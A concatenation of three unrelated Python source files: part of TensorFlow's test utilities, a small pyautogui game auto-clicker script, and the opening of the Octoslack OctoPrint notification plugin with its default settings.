self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
@contextlib.contextmanager
def _fake_gradient_tape_context_manager():
"""tf.gradients(...) implemented as tf.GradientTape context manager interface.
This is useful to test tf.gradients() in tests that uses tf.GradientTape().
Yields:
gradient tape instance that's implemented by tf.gradients() underneath.
"""
try:
class FakeGradientTape:
def watch(self, x):
pass
def gradient(self, y, x, grad_ys=None):
result = gradients_impl.gradients(y, x, grad_ys)
# Unlike `tape.gradient()`, `tf.gradients()` returns a list for a single
# element. So unpack if needed to match `tape.gradient()` behavior.
if not isinstance(x, (list, tuple)):
assert len(result) == 1
return result[0]
return result
yield FakeGradientTape()
finally:
pass
class AbstractGradientTape:
"""Abstract GradientTape context manager that has multiple implementations.
This is useful to test both tf.GradientTape() and tf.gradients() without
duplicating tests.
"""
def __init__(self, use_tape, persistent=False):
self._use_tape = use_tape
self._persistent = persistent
def __enter__(self):
if self._use_tape:
self._tape_impl = backprop.GradientTape(persistent=self._persistent)
else:
self._tape_impl = _fake_gradient_tape_context_manager()
return self._tape_impl.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
self._tape_impl.__exit__(exc_type, exc_val, exc_tb)
@contextlib.contextmanager
def run_functions_eagerly(run_eagerly):
"""Runs functions eagerly if `run_eagerly` is true.
WARNING: Setting `run_eagerly` to True in tests running in V1 graph mode
*WILL NOT* make the tf.function to run eagerly because eager is disabled by
default in V1. Instead, tf.function will run as a traced graph function.
Ensures that the state (for running functions eagerly) is back to the initial
`def_function.RUN_FUNCTIONS_EAGERLY` state.
Args:
run_eagerly: Boolean determining whether to run the function eagerly or not.
Raises:
ValueError if `run_eagerly` is not a boolean.
Yields:
Nothing.
"""
if not isinstance(run_eagerly, bool):
raise ValueError(
"Expected bool for `run_eagerly` but got {}".format(run_eagerly))
is_eager = context.executing_eagerly()
if not is_eager and run_eagerly:
logging.warning(
"Running tf.function eagerly in V1 graph mode is not supported. "
"tf.function will be run as a traced graph function.")
initial_state = def_function.functions_run_eagerly()
def_function.run_functions_eagerly(run_eagerly)
try:
yield
finally:
def_function.run_functions_eagerly(initial_state)
|
auto_game_typey.py
|
#!/usr/bin/python3
import pyautogui
import time
import keyboard
import threading
def print_pos():
while(1):
print(pyautogui.position())
def everysec_press():
while(1):
# pyautogui.dragRel(0,0,1,button='left')
# pyautogui.press('b')
pyautogui.press(' ')
time.sleep(0.05)
# time.sleep(0.5)
# if X>1900:
# break
print('press')
if keyboard.is_pressed('q'):
return
def everysec_click():
while(1):
pyautogui.click()
time.sleep(0.01)
print('click')
if keyboard.is_pressed('q'):
return
def everymin():
n = 35
while(1):
# n+=0.1
pyautogui.press('p')
for i in range(n):
time.sleep(1)
print(i)
if keyboard.is_pressed('q'):
return
if __name__=="__main__":
# __x = 1850
# __y = 950b b b
# pyautogui.click(x=__x,y=__y)
# t1 = threading.Thread(target=everysec_press)
# t2 = threading.Thread(target=everysec_click)
# t3 = threading.Thread(target=everymin)
# スレッドスタート
# t1.start()
# t2.start()
# t3.start()
print_pos()
|
__init__.py
|
# coding=utf-8
# encoding: utf-8
from __future__ import absolute_import
from octoprint.util.version import get_octoprint_version_string
from tempfile import mkstemp
from datetime import timedelta
from slackclient import SlackClient
from slacker import Slacker, IncomingWebhook
from imgurpython import ImgurClient
from imgurpython.helpers.error import ImgurClientError, ImgurClientRateLimitError
from pushbullet import Pushbullet
from pushover_complete import PushoverAPI
from rocketchat.api import RocketChatAPI
from matrix_client.client import MatrixClient
from matrix_client.client import Room as MatrixRoom
from PIL import Image
from octoprint.util import RepeatedTimer
from websocket import WebSocketConnectionClosedException
from minio import Minio
from sarge import run, Capture, shell_quote
from discord_webhook import DiscordWebhook, DiscordEmbed
import octoprint.util
import octoprint.plugin
import urllib2
import datetime
import base64
import Queue
import json
import os
import os.path
import exceptions
import uuid
import time
import datetime
import tinys3
import humanize
import time
import threading
import requests
import math
import re
import copy
import netifaces
import pytz
import socket
SLACKER_TIMEOUT = 60
COMMAND_EXECUTION_WAIT = 10
class OctoslackPlugin(
octoprint.plugin.SettingsPlugin,
octoprint.plugin.AssetPlugin,
octoprint.plugin.StartupPlugin,
octoprint.plugin.ShutdownPlugin,
octoprint.plugin.ProgressPlugin,
octoprint.plugin.EventHandlerPlugin,
octoprint.plugin.TemplatePlugin,
):
##TODO FEATURE - generate an animated gif of the print - easy enough if we can find a python ib to create the gif (images2gif is buggy & moviepy, imageio, and and visvis which rely on numpy haven't worked out as I never neven let numpy try to finish installing after 5/10 minutes on my RasPi3)
##TODO FEATURE - add the timelapse gallery for cancelled/failed/completed as a single image
##TODO FEATURE - Add support for Imgur image title + description
##TODO FEATURE - Optionally upload timelapse video to youtube & send a Slack message when the upload is complete
##TODO FEATURE - Define a third set of messages for each event to allow sending M117 commands to the printer
##TODO ENHANCEMENT - The progress event fires on gcode uploads and triggers Octoslack events. Test and fix if necessary.
##TODO ENHANCEMENT - Consider extending the progress snapshot minimum interval beyond Slack to other providers
##TODO ENHANCEMENT - Add Persoanl Token, emoji, avatar, and other formatting enhancements to Rocket.API once a library supports them (or update the libs yourself)
##TODO We've certainly moved past "it's time to refactor" line. Both the UI/JS/Python code need to be refactored
##TODO add multi-cam support: https://plugins.octoprint.org/plugins/multicam/
##~~ SettingsPlugin mixin
def get_settings_defaults(self):
return {
"connection_method": "APITOKEN",
"slack_apitoken_config": {
"api_token": "",
"enable_commands": True,
"commands_positive_reaction": ":thumbsup:",
"commands_negative_reaction": ":thumbsdown:",
"commands_processing_reaction": ":stopwatch:",
"commands_unauthorized_reaction": ":lock:",
},
"slack_webhook_config": {"webhook_url": ""},
"slack_identity": {
"existing_user": True,
"icon_url": "",
"icon_emoji": "",
"username": "",
},
"slack_rtm_enabled_commands": {
"help": {"enabled": True, "restricted": False},
"status": {"enabled": True, "restricted": False},
"stop": {"enabled": True, "restricted": False},
"pause": {"enabled": True, "restricted": False},
"resume": {"enabled": True, "restricted": False},
},
"slack_rtm_authorized_users": "",
"channel": "",
"pushbullet_config": {"access_token": "", "channel": ""},
"pushover_config": {"app_token": "", "user_key": ""},
"rocketchat_config": {
"server_url": "",
"username": "",
"password": "",
"channel": "",
},
"matrix_config": {
"server_url": "",
"access_token": "",
"user_id": "",
"channel": "",
},
"discord_config": {
"webhook_urls": "",
"alternate_username": "",
"avatar_url": "",
},
"ignore_cancel_fail_event": True,
"mattermost_compatability_mode": False,
"include_raspi_temp": True,
"snapshot_upload_method": "NONE",
"imgur_config": {
"client_id": "",
"client_secret": "",
"refresh_token": "",
"album_id": "",
},
"s3_config": {
"AWSAccessKey": "",
"AWSsecretKey": "",
"s3Bucket": "",
"file_expire_days": -1,
"URLStyle": "PATH",
},
"minio_config": {
"AccessKey": "",
"SecretKey": "",
"Bucket": "",
"Endpoint": "s3.amazonaws.com",
"secure": True,
},
"additional_snapshot_urls": "",
"snapshot_arrangement": "HORIZONTAL", ##HORIZTONAL or VERTICAL or GRID
"time_format": "HUMAN", ##FUZZY or EXACT or HUMAN
"supported_events": {
##Not a real event but we'll leverage the same config structure
"Help": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Help - Supported commands :question:",
"Fallback": "",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"IncludeSupportedCommands": True,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Startup": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Octoprint service started :chart_with_upwards_trend:",
"Fallback": "Octoprint service started",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": True,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Shutdown": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Octoprint service stopped :chart_with_downwards_trend:",
"Fallback": "Octoprint service stopped",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Connecting": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Connecting to printer :satellite:",
"Fallback": "Connecting to printer",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Connected": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Successfully connected to printer :computer:",
"Fallback": "Successfully connected to printer",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Disconnecting": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Printer disconnecting :confused:",
"Fallback": "Printer disconnecting",
"Color": "warning",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Disconnected": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Printer disconnected :worried:",
"Fallback": "Printer disconnected",
"Color": "danger",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Error": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Printer error :fire:",
"Fallback": "Printer error: {error}",
"Color": "danger",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintStarted": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: A new print has started :rocket:",
"Fallback": "Print started: {print_name}, Estimate: {remaining_time}",
"Color": "good",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": True,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintFailed": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print failed :bomb:",
"Fallback": "Print failed: {print_name}",
"Color": "danger",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintCancelling": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print is being cancelled :no_good:",
"Fallback": "Print is being cancelled: {print_name}",
"Color": "warning",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": False,
"ReportJobProgress": True,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintCancelled": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print cancelled :no_good:",
"Fallback": "Print cancelled: {print_name}",
"Color": "warning",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintDone": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print finished successfully :dancer:",
"Fallback": "Print finished successfully: {print_name}, Time: {elapsed_time}",
"Color": "good",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": True,
"ReportJobProgress": False,
"ReportFinalPrintTime": True,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
##Not a real event but we'll leverage the same config structure
"Progress": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print progress {pct_complete} :horse_racing:",
"Fallback": "Print progress: {pct_complete} - {print_name}, Elapsed: {elapsed_time}, Remaining: {remaining_time}",
"Color": "good",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": False,
"ReportJobProgress": True,
"ReportMovieStatus": False,
"UpdateMethod": "NEW_MESSAGE",
# Minimum time in minutes to wait before uploading a snapshot again for a progress upload
"SlackMinSnapshotUpdateInterval": 10,
"IntervalPct": 25,
"IntervalHeight": 0,
"IntervalTime": 0,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
##Not a real event but we'll leverage the same config structure
"GcodeEvent": {
"Enabled": False, ##Overwritten by each event
"ChannelOverride": "", ##Overwritten by each event
"Message": "", ##Overwritten by each event
"Fallback": "", ##Overwritten by each event
"Color": "good", ##Hardcoded to 'good' for now
"CaptureSnapshot": False, ##Overwritten by each event
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": False,
"ReportJobProgress": True,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
##Not a real event but we'll leverage the same config structure
"Heartbeat": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Heartbeat - Printer status: {printer_status} :heartbeat:",
"Fallback": "Heartbeat - Printer status: {printer_status}",
"Color": "good", ##Color may be updated in process_slack_event
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportMovieStatus": False,
"IntervalTime": 60,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintPaused": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print paused :zzz:",
"Fallback": "Print paused: {pct_complete} - {print_name}",
"Color": "warning",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": True,
"ReportJobProgress": True,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintResumed": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print resumed :runner:",
"Fallback": "Print resumed: {pct_complete} - {print_name}",
"Color": "good",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": True,
"ReportJobProgress": True,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"MetadataAnalysisStarted": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: File analysis started :runner:",
"Fallback": "File metadata analysis started: {print_name}",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": False,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"MetadataAnalysisFinished": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: File analysis complete :ok_hand:",
"Fallback": "File metadata analysis complete: {print_name}",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": False,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"MovieRendering": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Timelapse movie rendering :clapper:",
"Fallback": "Timelapse movie rendering: {print_name}",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportMovieStatus": True,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"MovieDone": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Timelapse movie rendering complete :movie_camera:",
"Fallback": "Timelapse movie rendering complete: {print_name}",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportMovieStatus": True,
"UploadMovie": False,
"UploadMovieLink": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"MovieFailed": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Timelapse movie rendering failed :boom:",
"Fallback": "Timelapse movie rendering failed: {print_name}, Error: {error}",
"Color": "danger",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportMovieStatus": True,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
},
"gcode_events": "",
"timezones": "|".join(pytz.common_timezones),
"timezone": "OS_Default",
"eta_date_format": "hh:mm tt <fuzzy date>",
}
def get_settings_restricted_paths(self):
return dict(
admin=[
["slack_apitoken_config", "api_token"],
["slack_webhook_config", "webhook_url"],
["pushbullet_config", "access_token"],
["pushover_config", "app_token"],
["rocketchat_config", "username"],
["rocketchat_config", "password"],
["matrix_config", "access_token"],
["s3_config", "AWSAccessKey"],
["s3_config", "AWSsecretKey"],
["s3_config", "s3Bucket"],
["minio_config", "AccessKey"],
["minio_config", "SecretKey"],
["minio_config", "Bucket"],
["minio_config", "Endpoint"],
["minio_config", "secure"],
["imgur_config", "client_id"],
["imgur_config", "client_secret"],
["imgur_config", "refresh_token"],
["imgur_config", "album_id"],
["additional_snapshot_urls"],
]
)
def get_settings_version(self):
return 1
def on_settings_save(self, data):
try:
octoprint.plugin.SettingsPlugin.on_settings_save(self, data)
self.update_progress_timer()
self.update_heartbeat_timer()
self.update_gcode_sent_listeners()
self._slack_next_progress_snapshot_time = 0
except Exception as e:
self._logger.exception(
"Error executing post-save actions, Error: " + str(e.message)
)
##~ TemplatePlugin mixin
##def get_template_vars(self):
## return dict()
def get_template_configs(self):
return [dict(type="settings", custom_bindings=False)]
##~~ AssetPlugin mixin
def get_assets(self):
return dict(
js=["js/Octoslack.js"],
css=["css/Octoslack.css"],
less=["less/Octoslack.less"],
)
##~~ Softwareupdate hook
def get_update_information(self):
# Define the configuration for your plugin to use with the Software Update
# Plugin here. See https://github.com/foosel/OctoPrint/wiki/Plugin:-Software-Update
# for details.
return dict(
Octoslack=dict(
displayName="Octoslack",
displayVersion=self._plugin_version,
# version check: github repository
type="github_release",
user="fraschetti",
repo="Octoslack",
current=self._plugin_version,
# update method: pip
pip="https://github.com/fraschetti/Octoslack/archive/{target_version}.zip",
)
)
##~~ StartupPlugin mixin
def on_after_startup(self):
self._logger.debug("Entering Slack RTM client init logic")
self.start_rtm_client()
self._logger.debug("Exited Slack RTM client init logic")
self.update_gcode_sent_listeners()
self.start_heartbeat_timer()
##~~ ShutdownPlugin mixin
def on_shutdown(self):
self.stop_rtm_client()
self._logger.debug("Stopped Slack RTM client")
self.stop_progress_timer()
self.stop_heartbeat_timer()
